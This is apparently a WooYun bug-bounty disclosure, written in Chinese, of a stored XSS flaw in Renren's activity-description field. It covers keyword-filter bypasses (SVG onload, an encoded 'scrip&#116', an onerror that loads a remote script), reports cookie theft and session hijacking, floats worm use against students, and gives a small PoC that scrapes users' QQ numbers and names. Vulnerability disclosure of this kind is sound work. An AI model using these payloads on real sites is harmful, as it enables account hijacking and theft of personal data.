WooYun.org

话说这里最初只做了前台过滤，抓包改下就可以上传任意长度的脚本了，所以在这里写蠕虫不用考虑跨域问题，不过&符号莫名其妙会被吃掉，不过没太大问题，后来也没提交。今天看了下发现漏洞被补了，不单单前台过滤。后台也进行了关键字检测比如<script>和一些别的关键字。虽然svg没过滤可以进行弹窗，但是不知道为什么以跟上资源链接就处问题，不过最后还是成功触发了。具体看下嘛截图吧，最初的测试我没截多少图，今天的多截几张补上来吧。用的游览器是火狐和chrome。

在填写活动介绍这边过滤不严，前台可以用抓包改包解决，后台的过滤不严密。
下面是第一次测试的时候，后台完全没有过滤，直接可以改包写入<script>xxxxx。

今天看的时候就这样了，后台加入了关键字过滤。

不过对svg没有过滤。但是后面不知道为什么svg/onload后面请求资源链接一直不能成功

就换了一下，顺带外链重新编码。另外重新编码的时候发现对script如果像这样

onerror="JavaScriptCode like <scrip&#116>"

就无法过滤了，应该是对编码后的数据都没有进行检测，只检测没有编码的。

附带几个svg的测试代码

onerror="with(document)body.appendChild(createElement('script')).src='xxxxxxxxx'"

<svg xmlns="url"><g onload="javascript:alert(1)"></g></svg>

我用一个账号是用火狐浏览器发布，然后用另一个账号通过chrome账号去访问，成功获得cookie，且可劫持。

由于社团人可以直接发布到人人主站，同时是专门针对大学生的（多好的鸡），可用作蠕虫。这里附上获取用户信息如电话号码、扣扣之类信息的一小段poc。域内访问m.renren.com然后调用。

function getQQ()
{
var quickExpr =/<div>Q([^<]*)/g;  
var headhtml = window.document.head.innerHTML;
var qq=quickExpr.exec(headhtml);
return qq[1];
}
function getname()
{
var quickExpr =/- ([^</tltle]*)/g;  
var headhtml = window.document.head.innerHTML;
var name=quickExpr.exec(headhtml);
return name[1];
}

匹配姓名，女神的姓名就打马赛克了。

女神QQ才不给你们

话说很快就删掉了测试用的活动，没有造成啥影响，跪求rank。红圈中显示活动取消。